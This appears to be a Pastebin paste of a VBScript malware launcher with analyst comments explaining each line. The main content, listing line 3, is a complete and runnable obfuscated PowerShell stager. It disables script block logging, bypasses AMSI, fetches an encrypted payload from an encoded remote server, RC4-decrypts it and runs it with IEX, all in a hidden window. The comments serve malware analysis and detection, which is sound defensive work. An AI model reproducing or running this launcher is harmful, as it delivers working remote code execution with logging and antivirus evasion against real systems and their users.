pipiskin22

Untitled

Sep 23rd, 2019
  ' ANALYSIS NOTE: VBScript launcher for an obfuscated PowerShell download-and-execute stager.
  ' Treat as a live malware sample. The notes below only describe what the visible code does.
  ' Listing lines 1-2: create a WScript.Shell object; it is used only to start the child process on line 4.
  1. Dim objShell
  2. Set objShell = WScript.CreateObject("WScript.Shell")
  ' Listing line 3 builds a single PowerShell command line. Chr(34) splices double quotes into the VBScript string.
  ' Switches (case-mangled and abbreviated): -NoProfile, -WindowStyle 1 (presumably Hidden - confirm),
  ' -ExecutionPolicy Bypass, -NoExit, -NonInteractive.
  ' Obfuscation layers: random casing, backtick escapes inside identifiers, and "{n}" -f reordering of string fragments.
  ' De-obfuscated behaviour, in the order it appears:
  '  - Stores type references (Dictionary[string,Object], ScriptBlock, Ref, ServicePointManager, WebRequest,
  '    CredentialCache, Text.Encoding, Convert) in oddly named variables so later code never names them directly.
  '  - If PSVersionTable.PSVersion.Major >= 3: reads the non-public static field cachedGroupPolicySettings of
  '    System.Management.Automation.Utils and sets EnableScriptBlockLogging and EnableScriptBlockInvocationLogging
  '    to 0, including under the HKEY_LOCAL_MACHINE ...\PowerShell\ScriptBlockLogging policy key name.
  '    If that field is not found, it replaces the ScriptBlock 'signatures' field with an empty HashSet[string].
  '  - Sets the non-public static field amsiInitFailed of System.Management.Automation.AmsiUtils to $true.
  '  - Sets ServicePointManager.Expect100Continue to 0 and creates a System.Net.WebClient that uses the system
  '    default proxy with default network credentials.
  '  - Adds User-Agent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" and a fixed Cookie header.
  '  - Derives key bytes from a 32-character hex string and defines a script block that implements the RC4
  '    key schedule and keystream XOR.
  '  - Decodes the server address from a Base64 (UTF-16) string and appends the path "/login/process.php".
  '    Decode that string offline to extract the network indicator.
  '  - Calls DownloadData, takes the first 4 bytes as an IV, decrypts the remainder with key = IV + key bytes,
  '    and pipes the resulting text to IEX (Invoke-Expression).
  ' NOTE(review): this layout resembles the publicly documented PowerShell Empire launcher; attribution is not
  ' confirmed from this page.
  ' Detection hints: a script host (wscript/cscript) spawning powershell with these abbreviated switches;
  ' reflection on AmsiUtils or cachedGroupPolicySettings; the hard-coded User-Agent and URI path above.
  ' The logging changes are made inside the PowerShell process, so process-creation command-line telemetry
  ' should still capture this launch - verify against your own logging setup.
  3. command = "POWErsHEll  -NOpRO  -WInDOw 1 -execUT  bYpasS -nOE  -nONINTeRAcTIve   "+Chr(34)+"${Q`3c} =  [tyPe](\"+Chr(34)+"{1}{2}{4}{5}{8}{9}{0}{6}{7}{3}\"+Chr(34)+" -f 'S','cOLleCT','i','jECt','Ons.GEneRIc.dicTi','O','ySTe','M.OB','naRy[','string,') ;  .(\"+Chr(34)+"{1}{0}\"+Chr(34)+" -f 'Item','sEt-')  (\"+Chr(34)+"{0}{2}{1}\"+Chr(34)+"-f'vAR','BF','IABle:qs')  ([TypE](\"+Chr(34)+"{2}{1}{0}\"+Chr(34)+" -f'K','CrIPTbloc','s') );    .(\"+Chr(34)+"{0}{2}{1}\"+Chr(34)+" -f'S','tem','ET-I')  ('vari'+'aBlE:'+'I46'+'9')  ( [TyPE](\"+Chr(34)+"{0}{1}\"+Chr(34)+" -F 'R','ef') ) ;  &(\"+Chr(34)+"{0}{1}\"+Chr(34)+" -f'sEt-iTE','m') (\"+Chr(34)+"{2}{3}{0}{1}\"+Chr(34)+" -f ':ZSN','je','VaRI','ABLE') ( [Type](\"+Chr(34)+"{5}{6}{1}{8}{3}{2}{4}{7}{0}\"+Chr(34)+"-F 'Er','nE','ERvI','s','cePOinTmaN','syste','m.','ag','t.')  ); ${D4`8H1y} =  [tYpE](\"+Chr(34)+"{3}{2}{5}{1}{4}{0}\"+Chr(34)+" -F 't','.weBreqU','tE','sys','ES','m.net'); &(\"+Chr(34)+"{1}{2}{0}\"+Chr(34)+"-f 'iTem','S','et-')  (\"+Chr(34)+"vAriA\"+Chr(34)+"+\"+Chr(34)+"b\"+Chr(34)+"+\"+Chr(34)+"LE:7\"+Chr(34)+"+\"+Chr(34)+"3E4\"+Chr(34)+")  ( [TYpE](\"+Chr(34)+"{4}{1}{2}{3}{0}{5}\"+Chr(34)+" -F'e','ySTem.NeT','.c','RED','s','ntIaLcACHE') ) ;  .(\"+Chr(34)+"{1}{2}{0}\"+Chr(34)+" -f 'Em','Se','t-it') (\"+Chr(34)+"{3}{0}{2}{1}\"+Chr(34)+" -f 'E:','m6WN','2','variABl')  ( [tYPE](\"+Chr(34)+"{0}{4}{1}{2}{3}\"+Chr(34)+"-F 'sY','tEm.TeXt.ENCO','d','Ing','S')  ); .(\"+Chr(34)+"{1}{0}{2}{3}\"+Chr(34)+"-f 'VaR','sET-','iAB','LE') ('P2F'+'r') (  [tYpe](\"+Chr(34)+"{3}{0}{2}{1}\"+Chr(34)+"-F'Xt','nCodIng','.E','te') ) ; ${LN`W6} =[tYPe](\"+Chr(34)+"{0}{2}{1}\"+Chr(34)+" -f 'c','VERT','ON')  ;IF(${pSV`e`RSiON`TAB`le}.\"+Chr(34)+"P`sVeRS`ION\"+Chr(34)+".\"+Chr(34)+"M`Ajor\"+Chr(34)+" -Ge 3){${7`Cd}= (&(\"+Chr(34)+"{0}{1}\"+Chr(34)+"-f 'vaR','IABle')  (\"+Chr(34)+"{0}{1}\"+Chr(34)+" -f 'I46','9') -va  ).\"+Chr(34)+"a`SseMB`Ly\"+Chr(34)+".(\"+Chr(34)+"{1}{0}{2}\"+Chr(34)+"-f 
'TTyp','GE','e').Invoke((\"+Chr(34)+"{6}{3}{7}{0}{5}{1}{8}{2}{4}\"+Chr(34)+" -f 'gem','.A','tomation.','em.Man','Utils','ent','Syst','a','u')).\"+Chr(34)+"GeTFiE`LD\"+Chr(34)+"((\"+Chr(34)+"{1}{4}{5}{3}{2}{0}\"+Chr(34)+"-f'Settings','cachedGro','y','c','upP','oli'),'N'+(\"+Chr(34)+"{3}{2}{1}{0}\"+Chr(34)+"-f'lic,Static','b','Pu','on'));IF(${7`cd}){${2`35}=${7`CD}.(\"+Chr(34)+"{0}{1}\"+Chr(34)+" -f'GEtV','AluE').Invoke(${nu`lL});IF(${2`35}[(\"+Chr(34)+"{2}{0}{1}\"+Chr(34)+" -f'i','ptB','Scr')+(\"+Chr(34)+"{1}{0}{2}\"+Chr(34)+"-f 'kL','loc','ogging')]){${2`35}[(\"+Chr(34)+"{0}{1}\"+Chr(34)+"-f 'S','criptB')+(\"+Chr(34)+"{1}{3}{2}{0}\"+Chr(34)+"-f 'ing','l','Logg','ock')][(\"+Chr(34)+"{1}{3}{2}{0}{4}\"+Chr(34)+" -f 'eScrip','E','abl','n','tB')+(\"+Chr(34)+"{0}{1}{3}{2}\"+Chr(34)+"-f'lockLo','g','ing','g')]=0;${2`35}[(\"+Chr(34)+"{1}{0}{2}\"+Chr(34)+"-f'ri','Sc','ptB')+(\"+Chr(34)+"{2}{0}{1}\"+Chr(34)+" -f'o','gging','lockL')][(\"+Chr(34)+"{3}{6}{5}{0}{4}{1}{2}{7}\"+Chr(34)+" -f'criptB','ti','onLoggin','Enab','lockInvoca','S','le','g')]=0}${v`AL}= (.(\"+Chr(34)+"{1}{0}\"+Chr(34)+"-f 'eM','IT') (\"+Chr(34)+"{1}{3}{0}{2}\"+Chr(34)+"-f'BLe:q','VA','3c','rIa')  ).\"+Chr(34)+"va`lUe\"+Chr(34)+"::(\"+Chr(34)+"{0}{1}\"+Chr(34)+" -f 'N','eW').Invoke();${V`Al}.(\"+Chr(34)+"{1}{0}\"+Chr(34)+" -f'dd','A').Invoke((\"+Chr(34)+"{2}{3}{1}{0}\"+Chr(34)+" -f 'tB','rip','EnableS','c')+(\"+Chr(34)+"{3}{1}{2}{0}\"+Chr(34)+"-f'g','og','gin','lockL'),0);${V`Al}.(\"+Chr(34)+"{1}{0}\"+Chr(34)+" -f'D','Ad').Invoke((\"+Chr(34)+"{0}{4}{2}{7}{5}{6}{1}{3}\"+Chr(34)+"-f'EnableS','nLoggi','r','ng','c','kIn','vocatio','iptBloc'),0);${2`35}[(((\"+Chr(34)+"{7}{5}{11}{4}{2}{14}{8}{3}{13}{0}{9}{6}{16}{15}{10}{1}{12}\"+Chr(34)+" -f 'ndo','cri','oftware','licie','NEvFTS','_','werShel','HKEY','FTPo','wsvFTPo','TS','LOCAL_MACHI','ptB','svFTMicrosoftvFTWi','v','F','lv')).\"+Chr(34)+"rEP`l`Ace\"+Chr(34)+"('vFT',[STRIng][CHaR]92))+(\"+Chr(34)+"{1}{0}{2}\"+Chr(34)+"-f 'c','lo','kLogging')]=${v`AL}}ELse{  
(&(\"+Chr(34)+"{2}{1}{0}\"+Chr(34)+" -f'aRIABLe','V','gEt-')  (\"+Chr(34)+"{1}{0}\"+Chr(34)+" -f'F','qsb') -vALUeonlY ).\"+Chr(34)+"GetFIe`ld\"+Chr(34)+"((\"+Chr(34)+"{0}{2}{1}\"+Chr(34)+" -f'si','tures','gna'),'N'+(\"+Chr(34)+"{2}{1}{3}{0}\"+Chr(34)+" -f'c','Public,Sta','on','ti')).\"+Chr(34)+"Se`TV`ALue\"+Chr(34)+"(${NU`LL},(.(\"+Chr(34)+"{1}{2}{3}{0}\"+Chr(34)+"-f'eCT','NeW-','O','bJ') (\"+Chr(34)+"{1}{8}{3}{0}{9}{2}{5}{7}{4}{6}\"+Chr(34)+" -f 's','CoL','.H','Tion','RIng','AshSet[',']','sT','Lec','.GeNeRIC')))}${R`eF}=  ${I4`69}.\"+Chr(34)+"A`Ss`EmBlY\"+Chr(34)+".(\"+Chr(34)+"{2}{0}{1}\"+Chr(34)+" -f'TyP','e','GEt').Invoke((\"+Chr(34)+"{3}{0}{6}{1}{7}{10}{9}{2}{5}{4}{8}\"+Chr(34)+" -f'ystem.M','e','mation','S','ti','.AmsiU','anagem','nt.','ls','uto','A'));${R`ef}.(\"+Chr(34)+"{0}{1}{2}\"+Chr(34)+"-f'GEtFIE','l','d').Invoke((\"+Chr(34)+"{0}{1}{3}{2}\"+Chr(34)+" -f 'amsiIn','it','led','Fai'),(\"+Chr(34)+"{1}{0}{2}{4}{3}\"+Chr(34)+" -f'nPublic,','No','St','c','ati')).(\"+Chr(34)+"{1}{0}{2}\"+Chr(34)+"-f'AlU','SeTV','e').Invoke(${NU`lL},${T`RuE});}; ${zsn`je}::\"+Chr(34)+"eX`PECt100CoNtI`N`Ue\"+Chr(34)+"=0;${2`A1}=.(\"+Chr(34)+"{0}{1}{2}\"+Chr(34)+" -f'New-','O','bjECt') (\"+Chr(34)+"{0}{3}{2}{1}\"+Chr(34)+"-f'SySt','nT','NEt.WEBClIE','eM.');${U}=((\"+Chr(34)+"{13}{14}{5}{10}{2}{7}{6}{8}{9}{4}{0}{12}{1}{3}{11}\"+Chr(34)+"-f 'nt/7','rv:11',' 6.1; W','.0) like Ge','ide',' ','4;','OW6',' ','Tr','(Windows NT','cko','.0; ','Mo','zilla/5.0'));${2`A1}.\"+Chr(34)+"hEAD`eRS\"+Chr(34)+".(\"+Chr(34)+"{1}{0}\"+Chr(34)+" -f'D','Ad').Invoke((\"+Chr(34)+"{2}{1}{0}\"+Chr(34)+"-f'ent','Ag','User-'),${U});${2`A1}.\"+Chr(34)+"HE`AD`ers\"+Chr(34)+".(\"+Chr(34)+"{1}{0}\"+Chr(34)+" -f'D','Ad').Invoke((\"+Chr(34)+"{2}{1}{0}\"+Chr(34)+" -f'nt','ge','User-A'),${u});${2`A1}.\"+Chr(34)+"p`ROxY\"+Chr(34)+"=  ( &('Ls')  (\"+Chr(34)+"Va\"+Chr(34)+"+\"+Chr(34)+"ria\"+Chr(34)+"+\"+Chr(34)+"Bl\"+Chr(34)+"+\"+Chr(34)+"E:D4\"+Chr(34)+"+\"+Chr(34)+"8H1Y\"+Chr(34)+") 
).\"+Chr(34)+"VAl`Ue\"+Chr(34)+"::\"+Chr(34)+"d`EFau`LT`w`eBPrOXY\"+Chr(34)+";${2`A1}.\"+Chr(34)+"pro`xy\"+Chr(34)+".\"+Chr(34)+"creDe`NTIA`lS\"+Chr(34)+" =   ${7`3e4}::\"+Chr(34)+"defaUltnet`WorKCReD`EN`T`i`AlS\"+Chr(34)+";${s`crI`PT:`P`RoxY} = ${2`A1}.\"+Chr(34)+"p`ROXY\"+Chr(34)+";${K}= (.(\"+Chr(34)+"{0}{1}\"+Chr(34)+"-f 'V','ariabLe') (\"+Chr(34)+"{0}{1}\"+Chr(34)+"-f '2M','6Wn')).\"+Chr(34)+"VA`LuE\"+Chr(34)+"::\"+Chr(34)+"A`scII\"+Chr(34)+".(\"+Chr(34)+"{1}{2}{0}\"+Chr(34)+" -f'tEs','G','eTBY').Invoke((\"+Chr(34)+"{6}{3}{0}{7}{1}{4}{5}{2}\"+Chr(34)+"-f 'f','9f3f75','25','f23','175793649','115c1b','2','a357'));${r}={${D},${k}=${Ar`GS};${s}=0..255;0..255|.('%'){${J}=(${j}+${S}[${_}]+${K}[${_}%${k}.\"+Chr(34)+"Cou`NT\"+Chr(34)+"])%256;${S}[${_}],${s}[${J}]=${S}[${j}],${s}[${_}]};${d}|&('%'){${I}=(${I}+1)%256;${h}=(${H}+${s}[${i}])%256;${s}[${i}],${S}[${h}]=${s}[${h}],${S}[${I}];${_}-BXOR${S}[(${S}[${I}]+${S}[${H}])%256]}};${S`er}=$(  ${P`2FR}::\"+Chr(34)+"UniC`oDe\"+Chr(34)+".\"+Chr(34)+"g`etSt`Ri`Ng\"+Chr(34)+"(  ${Ln`w6}::(\"+Chr(34)+"{0}{3}{1}{2}\"+Chr(34)+"-f 'FromBASe6','StR','iNG','4').Invoke((\"+Chr(34)+"{7}{14}{12}{2}{3}{6}{15}{9}{13}{17}{1}{4}{10}{8}{16}{0}{5}{18}{11}\"+Chr(34)+" -f 'xA','MgAyA','6A','C8ALwAxADM','D','DIANg','ANw','aAB0A','AL','ADEAMQA','k','gAMAAwAA==','AcAA','3AC','HQ','Au','gA','4A','A6AD'))));${T}=(\"+Chr(34)+"{4}{3}{1}{0}{2}\"+Chr(34)+" -f '.','ess','php','proc','/login/');${2`A1}.\"+Chr(34)+"H`eaDE`Rs\"+Chr(34)+".(\"+Chr(34)+"{1}{0}\"+Chr(34)+"-f 'D','Ad').Invoke((\"+Chr(34)+"{0}{1}\"+Chr(34)+" -f 'Co','okie'),(\"+Chr(34)+"{3}{0}{5}{6}{7}{1}{2}{4}\"+Chr(34)+" -f'D','0','+fzJ4ODBSCN','ZrshYEslfzwPMu','l0=','=xPdK','3Mt','HUCXtw'));${D`Ata}=${2`A1}.(\"+Chr(34)+"{1}{0}{2}\"+Chr(34)+" -f'OwN','D','LOADData').Invoke(${S`ER}+${T});${iV}=${DA`TA}[0..3];${D`Ata}=${Da`TA}[4..${d`ATA}.\"+Chr(34)+"l`eNgtH\"+Chr(34)+"];-joIn[ChAr[]](& ${R} ${d`ATA} (${iV}+${K}))|&(\"+Chr(34)+"{1}{0}\"+Chr(34)+" -f 'EX','I')"+Chr(34)+""
  ' Listing line 4: start the command with window style 0 (hidden). No third argument is passed,
  ' so the script does not wait for PowerShell to exit.
  4. objShell.Run command,0
  ' Listing line 5: release the shell object. The PowerShell child process keeps running.
  5. Set objShell = Nothing